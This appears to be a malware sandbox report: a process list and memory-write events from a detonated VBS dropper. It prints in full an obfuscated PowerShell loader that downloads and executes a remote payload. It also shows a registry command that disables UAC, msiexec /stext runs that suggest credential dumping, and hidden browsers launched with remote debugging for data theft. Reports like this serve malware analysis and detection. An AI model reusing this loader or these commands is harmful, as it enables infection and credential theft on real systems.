PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 404 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2004 wrote to memory of 4264 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f592c9039e109241cbfd30ae6b0ec2c1098b10ca1dfa80eb427edea6564265f5.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hjremarginerne Pastelfarvens Electroscission Luksusgenstande #>;$problemers='Kongebonde';<#Prowled Svovlsurt Regionsplanretningsliniens Oprindeligt tankskib Pantstterens Schleichera #>; function Umaadeholdenhed($Targes){If ($host.DebuggerEnabled) {$Animatist++;}$Decimerende=$Promonarchists+$Targes.'Length' - $Animatist; for ( $Ordinres=4;$Ordinres -lt $Decimerende;$Ordinres+=5){$rallyes=$Ordinres;$Notationsformernes+=$Targes[$Ordinres];}$Notationsformernes;}function Disrespecter($Savouriest){ & ($Overassertion) ($Savouriest);}$Godmaking=Umaadeholdenhed ' Fi,MsvmmoEphazUnsei mkalAnthlS,mfaTvil/Jimm ';$Nadia=Umaadeholdenhed 'K geTAfsmlIsodsIndf1Fuld2Vest ';$Nerver='Ini [H ran.akte J cT Je,.Wep.sOmgre IndRMemoVBullIAnneC ValESlynpPaafoSejlIprotnSocit ForM ennaIllenFwoma ,evgRe.neHarmRcont]Bak : dbe: linSRoboE UndCOut UKalkrSu iIA.trTamm y arPCounr HenOrrflT ndro,okicFyldOMe llDefi=Pala$StudN UniaSnftDDekuI linAGyne ';$Godmaking+=Umaadeholdenhed 'Vvre5 Tr . Mor0Incl Ador(ExpoW Fari in nSkatd.nfao erswFo ls ol NonnNFiskTFrem A.sa1 pr0Skr . Bat0 L b;Samm EnteWKal,i drunDe i6 For4 ot;Tilh AuguxBage6Pead4Unde;to v Manlr KodvTrav:Brit1wate3Mod,1 kam.Gav,0Disp)Cha ,isiGVelfe Re,c HerkFredoTiko/Indd2Rand0.ubt1Arca0 Sm,0Teks1 Sel0Indu1Udta harpFUdkriPendr vere UnffKlaro angxh ez/Sole1Luft3T.av1,rem.Bys.0Immo ';$Sabotagen=Umaadeholdenhed 'KalkUIndhShru,E EthrPres-indiaCa og SufEPensNPaeat For ';$Gefulltefish=Umaadeholdenhed ' kruh BestKlodt Comp ives Fo.:Dile/Hjem/Aandd ,enrWhisiBr,nv Flse Bus.Cromg.iasoKo soStetg orslIncleMart. ollc Sv o.ubtmF.jl/EfteuAs.ecObse?.augeCounxPolypEbonoS lfrk ngtAkku=UrosdspisoAbasw SkanIn.alGru oNedsaSknkd art&AzotiBlepdBjer=Divi1,rmi9Brani.lleuharc6Ca p4 Evom rev- Kiwn AerlMordz Che4NyerZK,nskOuts_BizaAUnt,kUndeo AmpVGrunG UndwUnre_ResecWardzAdjoESiegW FluuTouc6Unprs W,i1Ledewmongx nti4 Agr ';$Tripl=Umaadeholdenhed 'Se.i>Best ';$Overassertion=Umaadeholdenhed 'UndeiunmaEAn hx Qua ';$Regnearter='Celebriteternes119';$dryptrringens='\Trosbekendelsers.Kas';Disrespecter (Umaadeholdenhed ' Fls$KartG adrlNonro R,dBTrava sp LR as: eorqCustuTolda vanKLgelENonaRScroi DisCTest=G.de$OphvESwi NAfmiVAdve:LaanaSpndPSta PBlacDIde aAnakt No aUndd+ S n$ DioDFkalR fjeY tfPOs eTBlearR.grRRigsIFredNLommg anseKoncNUnv sTykt ');Disrespecter (Umaadeholdenhed ' min$P,lmGPhytLKildoHeksB dipASprelSa d:InfiTHoloU SynRBrasTLo.eLGnu ECondD Rox=be a$ CoegSabeE JuvFStvnU KrllK.rklmatrTSt.lEImitf no,iSkobSReseHLem..Gaagshy ePAlliLEntrICophTC mm( en$ScotTTragr Da iF ltP,skrlOpa )Nont ');Disrespecter (Umaadeholdenhed $Nerver);$Gefulltefish=$turtled[0];$Spisevogns=(Umaadeholdenhed ' Tok$StregInteLRashOParobbindaPapilrewa:For,hShesIAnguSMo,otCeyloBogcnSoubE qui=.pryN olieMatrWSpro-K,pko TribDetejDataEUnsuC tatDhun FysiSNov YMadasKaoltGaouEB,llM .in.Pik.NNonpeCarrTTaar.JgerWNykueQuodbLigecWashL dsaiTautEUnl n andtDi.s ');Disrespecter ($Spisevogns);Disrespecter (Umaadeholdenhed 'Lumi$sci hForaiBa os ProtGsteoUnivn traeNon .AggrH amseStbeaAci dM dkeBugtrSubds bre[Unpe$U sySi daaJvnfbGlyco UdktLieba .ergSkumebar npama]Flyd= U.i$ErgoGTan oBilldAmorm laaMi ikChoniTi bn nngHale ');$Incomprehended=Umaadeholdenhed 'Serp$ ernhBehaiNonds Re tUndeoSlovnForhe Str.CrisD MagoClonwB,rwnRusll KviostejaNatudPulsFFo miVacalMarceCowo(A to$W,doG SveetilsfHenvu inhlundelForttK aleKredf CroiXenosOc eh Dis,B,er$ ineRTndeeSkmteSa,nn B ulSkraiP.alsAlfat K.uiAfhjn antgStvr) ,ic ';$Reenlisting=$quakeric;Disrespecter (Umaadeholdenhed ' Squ$FrucG KyslUn.eOHundBNonaAForkLUnte:Photqb.inUJoinEInteM UdlAgranDSm doFors=Alve(ElekTEctreUrimsPar t f r-Ko tpOrdraOb iT Fa Hr of Prim$HoejRLe iEMedde S.iNBlokLOffeIDidoSPrfaTHymnIMaanNMajeGObdu)Suba ');while (!$quemado) {Disrespecter (Umaadeholdenhed 'Slut$Hemog,esmlMello MurbSlagaR ddlSter:SupeFTri,nOveruTwopgdebufTol,r Ocei Oute.men= Fje$PeritSmrrrHkleuConteEmpi ') ;Disrespecter $Incomprehended;Disrespecter (Umaadeholdenhed 'Svans TkkTvidea CloR ndutStil-KlipsCop lInosE emoeMongPPseu Refo4Spnd ');Disrespecter (Umaadeholdenhed 'Amph$EpheGPalml U voGennBDynaAOv.rl Sej: recqTestUBelrEt faMRingA Aphd oplOPoli= Unc(LightOff ERe eSDi itMona-AkkopAnimaNonfTTirrH Kin Al e$Nic.rMi rerovfeSigtnM jklanglIC ntSSkaftopreIOccunOr gGLino)Sig. ') ;Disrespecter (Umaadeholdenhed 'Soja$Tu ig,andLP edo MamBHockADatalFavn:OpfiRsyntES ifLG.rmaTa,kXOd eAKnstnMer t Ter=Kach$ asiG leuLUd aOUn ebMi,lAPreaLBai.:UnreP ExqrPolieT.irc,lloIRu.dRfalscSmaguSpecl EpiAA,chTKva eB.eg+ red+Resp%Cont$BalsTDis,U GodrF nat Intl co,E Oz DFre . Pi,C ompO etcUMininFestT,ksa ') ;$Gefulltefish=$turtled[$Relaxant];}$Fensmark=316424;$Raptusernes158=29872;Disrespecter (Umaadeholdenhed ' vru$ ShogStryLUrproSeclBZ.omaWileLFr a: Ca,nIgnaOUnfiNAppliPlanNFallT oneSammrBes,p UnhRKostEChamTBlomaEmbabCirkI.ampLInviiPladtSp lY Deb Samm=.col SquaG antEForfTC ga- LufcShoao TetnHjreTRegnENephnDacaTSwin Napo$Un xrpianEBli,EfilinHis L ideiCrumsTilbTbedyIHr sNBal,gDisk ');Disrespecter (Umaadeholdenhed ' Afh$MansgAtrolKar,oCostbSc ea ManlH er:Str OOxeapReprbA faeOutcvAnc aPacerTrkaiPennn blugGenesRat,sGreetta,meMal dSuggsFogg Non= Sel Vels[ FlaSTomoyVitrs raft nsieChurmDi.t.Ort CS uio podn angvJeaneAvler B.dt lec]Titi:Akts:In,pF emirRundoMagim ,duB Ud.aForms CoueUldt6Ecch4 UndSshiktAdulr FotiOutbnCancgCaro(Komm$ simN EksoRecanGenbiRygen.kvhtFil,eRrfrr SejpI dfrSpireTilktNotaaCornbKom,iPurilCykeiVorttBaigymedi)i.dt ');Disrespecter (Umaadeholdenhed ' nst$ tregPrinlBloko FinbCameAHandlPa k:TweeL De E GylvSupreTrykVDa te,andJAntie EufSBes. Tryk=D.fe eta[,avisS raYFal SUnabTMo oeOplomStro. RadTForsE Pl xB,lltduod.Imp eBanjnMus CInteo gladSteeIEtf.N .orGkr s]Ulff: Roc:RenvAAfspsfermC SkoiTilii C y.DestGBifoeChootSn.ts HeltGermRCithIGubeNNedsgAjax( Bde$MilloFletPFre,bAccoe,ltfvO dtAIn.er Su,I FarnGramg nomSGivesm,vetHe aeBed DLoneSF,em) emi ');Disrespecter (Umaadeholdenhed 'Ikeb$Lej GRgerlAtmooNonmbAmarAJensL Inv:Hamil R,tAOverSAkkoESociR SkoPBundRDaydiVestnspecT UnseSpalROutsDtalvEPr afTherI TogNOv rI regTSuprI BinOWoodnc rds U l=Rigs$ NatL OutEM trvBurle P cVGurnET anJ GolENormSsubj.R ngSDiplUVensb,olsSWildt coorRegiIHollNU,trg Dr (Evac$SenefFonteGoveN D ms chrmXystaSta r LevK imm, Kom$A,toRRecoaEi,ePTetrt onsu oorsBro EBaanr DagnSkolE BorsDobb1Sand5Ypp 8Damp)Unde ');Disrespecter $Laserprinterdefinitions;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Hjremarginerne Pastelfarvens Electroscission Luksusgenstande #>;$problemers='Kongebonde';<#Prowled Svovlsurt Regionsplanretningsliniens Oprindeligt tankskib Pantstterens Schleichera #>; function Umaadeholdenhed($Targes){If ($host.DebuggerEnabled) {$Animatist++;}$Decimerende=$Promonarchists+$Targes.'Length' - $Animatist; for ( $Ordinres=4;$Ordinres -lt $Decimerende;$Ordinres+=5){$rallyes=$Ordinres;$Notationsformernes+=$Targes[$Ordinres];}$Notationsformernes;}function Disrespecter($Savouriest){ & ($Overassertion) ($Savouriest);}$Godmaking=Umaadeholdenhed ' Fi,MsvmmoEphazUnsei mkalAnthlS,mfaTvil/Jimm ';$Nadia=Umaadeholdenhed 'K geTAfsmlIsodsIndf1Fuld2Vest ';$Nerver='Ini [H ran.akte J cT Je,.Wep.sOmgre IndRMemoVBullIAnneC ValESlynpPaafoSejlIprotnSocit ForM ennaIllenFwoma ,evgRe.neHarmRcont]Bak : dbe: linSRoboE UndCOut UKalkrSu iIA.trTamm y arPCounr HenOrrflT ndro,okicFyldOMe llDefi=Pala$StudN UniaSnftDDekuI linAGyne ';$Godmaking+=Umaadeholdenhed 'Vvre5 Tr . Mor0Incl Ador(ExpoW Fari in nSkatd.nfao erswFo ls ol NonnNFiskTFrem A.sa1 pr0Skr . Bat0 L b;Samm EnteWKal,i drunDe i6 For4 ot;Tilh AuguxBage6Pead4Unde;to v Manlr KodvTrav:Brit1wate3Mod,1 kam.Gav,0Disp)Cha ,isiGVelfe Re,c HerkFredoTiko/Indd2Rand0.ubt1Arca0 Sm,0Teks1 Sel0Indu1Udta harpFUdkriPendr vere UnffKlaro angxh ez/Sole1Luft3T.av1,rem.Bys.0Immo ';$Sabotagen=Umaadeholdenhed 'KalkUIndhShru,E EthrPres-indiaCa og SufEPensNPaeat For ';$Gefulltefish=Umaadeholdenhed ' kruh BestKlodt Comp ives Fo.:Dile/Hjem/Aandd ,enrWhisiBr,nv Flse Bus.Cromg.iasoKo soStetg orslIncleMart. ollc Sv o.ubtmF.jl/EfteuAs.ecObse?.augeCounxPolypEbonoS lfrk ngtAkku=UrosdspisoAbasw SkanIn.alGru oNedsaSknkd art&AzotiBlepdBjer=Divi1,rmi9Brani.lleuharc6Ca p4 Evom rev- Kiwn AerlMordz Che4NyerZK,nskOuts_BizaAUnt,kUndeo AmpVGrunG UndwUnre_ResecWardzAdjoESiegW FluuTouc6Unprs W,i1Ledewmongx nti4 Agr ';$Tripl=Umaadeholdenhed 'Se.i>Best ';$Overassertion=Umaadeholdenhed 'UndeiunmaEAn hx Qua ';$Regnearter='Celebriteternes119';$dryptrringens='\Trosbekendelsers.Kas';Disrespecter (Umaadeholdenhed ' Fls$KartG adrlNonro R,dBTrava sp LR as: eorqCustuTolda vanKLgelENonaRScroi DisCTest=G.de$OphvESwi NAfmiVAdve:LaanaSpndPSta PBlacDIde aAnakt No aUndd+ S n$ DioDFkalR fjeY tfPOs eTBlearR.grRRigsIFredNLommg anseKoncNUnv sTykt ');Disrespecter (Umaadeholdenhed ' min$P,lmGPhytLKildoHeksB dipASprelSa d:InfiTHoloU SynRBrasTLo.eLGnu ECondD Rox=be a$ CoegSabeE JuvFStvnU KrllK.rklmatrTSt.lEImitf no,iSkobSReseHLem..Gaagshy ePAlliLEntrICophTC mm( en$ScotTTragr Da iF ltP,skrlOpa )Nont ');Disrespecter (Umaadeholdenhed $Nerver);$Gefulltefish=$turtled[0];$Spisevogns=(Umaadeholdenhed ' Tok$StregInteLRashOParobbindaPapilrewa:For,hShesIAnguSMo,otCeyloBogcnSoubE qui=.pryN olieMatrWSpro-K,pko TribDetejDataEUnsuC tatDhun FysiSNov YMadasKaoltGaouEB,llM .in.Pik.NNonpeCarrTTaar.JgerWNykueQuodbLigecWashL dsaiTautEUnl n andtDi.s ');Disrespecter ($Spisevogns);Disrespecter (Umaadeholdenhed 'Lumi$sci hForaiBa os ProtGsteoUnivn traeNon .AggrH amseStbeaAci dM dkeBugtrSubds bre[Unpe$U sySi daaJvnfbGlyco UdktLieba .ergSkumebar npama]Flyd= U.i$ErgoGTan oBilldAmorm laaMi ikChoniTi bn nngHale ');$Incomprehended=Umaadeholdenhed 'Serp$ ernhBehaiNonds Re tUndeoSlovnForhe Str.CrisD MagoClonwB,rwnRusll KviostejaNatudPulsFFo miVacalMarceCowo(A to$W,doG SveetilsfHenvu inhlundelForttK aleKredf CroiXenosOc eh Dis,B,er$ ineRTndeeSkmteSa,nn B ulSkraiP.alsAlfat K.uiAfhjn antgStvr) ,ic ';$Reenlisting=$quakeric;Disrespecter (Umaadeholdenhed ' Squ$FrucG KyslUn.eOHundBNonaAForkLUnte:Photqb.inUJoinEInteM UdlAgranDSm doFors=Alve(ElekTEctreUrimsPar t f r-Ko tpOrdraOb iT Fa Hr of Prim$HoejRLe iEMedde S.iNBlokLOffeIDidoSPrfaTHymnIMaanNMajeGObdu)Suba ');while (!$quemado) {Disrespecter (Umaadeholdenhed 'Slut$Hemog,esmlMello MurbSlagaR ddlSter:SupeFTri,nOveruTwopgdebufTol,r Ocei Oute.men= Fje$PeritSmrrrHkleuConteEmpi ') ;Disrespecter $Incomprehended;Disrespecter (Umaadeholdenhed 'Svans TkkTvidea CloR ndutStil-KlipsCop lInosE emoeMongPPseu Refo4Spnd ');Disrespecter (Umaadeholdenhed 'Amph$EpheGPalml U voGennBDynaAOv.rl Sej: recqTestUBelrEt faMRingA Aphd oplOPoli= Unc(LightOff ERe eSDi itMona-AkkopAnimaNonfTTirrH Kin Al e$Nic.rMi rerovfeSigtnM jklanglIC ntSSkaftopreIOccunOr gGLino)Sig. ') ;Disrespecter (Umaadeholdenhed 'Soja$Tu ig,andLP edo MamBHockADatalFavn:OpfiRsyntES ifLG.rmaTa,kXOd eAKnstnMer t Ter=Kach$ asiG leuLUd aOUn ebMi,lAPreaLBai.:UnreP ExqrPolieT.irc,lloIRu.dRfalscSmaguSpecl EpiAA,chTKva eB.eg+ red+Resp%Cont$BalsTDis,U GodrF nat Intl co,E Oz DFre . Pi,C ompO etcUMininFestT,ksa ') ;$Gefulltefish=$turtled[$Relaxant];}$Fensmark=316424;$Raptusernes158=29872;Disrespecter (Umaadeholdenhed ' vru$ ShogStryLUrproSeclBZ.omaWileLFr a: Ca,nIgnaOUnfiNAppliPlanNFallT oneSammrBes,p UnhRKostEChamTBlomaEmbabCirkI.ampLInviiPladtSp lY Deb Samm=.col SquaG antEForfTC ga- LufcShoao TetnHjreTRegnENephnDacaTSwin Napo$Un xrpianEBli,EfilinHis L ideiCrumsTilbTbedyIHr sNBal,gDisk ');Disrespecter (Umaadeholdenhed ' Afh$MansgAtrolKar,oCostbSc ea ManlH er:Str OOxeapReprbA faeOutcvAnc aPacerTrkaiPennn blugGenesRat,sGreetta,meMal dSuggsFogg Non= Sel Vels[ FlaSTomoyVitrs raft nsieChurmDi.t.Ort CS uio podn angvJeaneAvler B.dt lec]Titi:Akts:In,pF emirRundoMagim ,duB Ud.aForms CoueUldt6Ecch4 UndSshiktAdulr FotiOutbnCancgCaro(Komm$ simN EksoRecanGenbiRygen.kvhtFil,eRrfrr SejpI dfrSpireTilktNotaaCornbKom,iPurilCykeiVorttBaigymedi)i.dt ');Disrespecter (Umaadeholdenhed ' nst$ tregPrinlBloko FinbCameAHandlPa k:TweeL De E GylvSupreTrykVDa te,andJAntie EufSBes. Tryk=D.fe eta[,avisS raYFal SUnabTMo oeOplomStro. RadTForsE Pl xB,lltduod.Imp eBanjnMus CInteo gladSteeIEtf.N .orGkr s]Ulff: Roc:RenvAAfspsfermC SkoiTilii C y.DestGBifoeChootSn.ts HeltGermRCithIGubeNNedsgAjax( Bde$MilloFletPFre,bAccoe,ltfvO dtAIn.er Su,I FarnGramg nomSGivesm,vetHe aeBed DLoneSF,em) emi ');Disrespecter (Umaadeholdenhed 'Ikeb$Lej GRgerlAtmooNonmbAmarAJensL Inv:Hamil R,tAOverSAkkoESociR SkoPBundRDaydiVestnspecT UnseSpalROutsDtalvEPr afTherI TogNOv rI regTSuprI BinOWoodnc rds U l=Rigs$ NatL OutEM trvBurle P cVGurnET anJ GolENormSsubj.R ngSDiplUVensb,olsSWildt coorRegiIHollNU,trg Dr (Evac$SenefFonteGoveN D ms chrmXystaSta r LevK imm, Kom$A,toRRecoaEi,ePTetrt onsu oorsBro EBaanr DagnSkolE BorsDobb1Sand5Ypp 8Damp)Unde ');Disrespecter $Laserprinterdefinitions;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files\Google\Chrome\Application\Chrome.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff91e0ccc40,0x7ff91e0ccc4c,0x7ff91e0ccc58

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\zjeuyyrnfaw"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\zjeuyyrnfaw"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\jdjnzqbotiodecn"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ufpfzjmihqgihqcyzq"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,4220174589258008699,4746808390079144065,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1912 /prefetch:2

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2156,i,4220174589258008699,4746808390079144065,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2204 /prefetch:3

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2232,i,4220174589258008699,4746808390079144065,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2364 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,4220174589258008699,4746808390079144065,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3180 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,4220174589258008699,4746808390079144065,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3260 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4608,i,4220174589258008699,4746808390079144065,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4564 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4756,i,4220174589258008699,4746808390079144065,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4752 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3164,i,4220174589258008699,4746808390079144065,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4368 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ff91e6a46f8,0x7ff91e6a4708,0x7ff91e6a4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,15741421921792547177,9954080784123959149,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,15741421921792547177,9954080784123959149,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,15741421921792547177,9954080784123959149,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2748 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2156,15741421921792547177,9954080784123959149,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

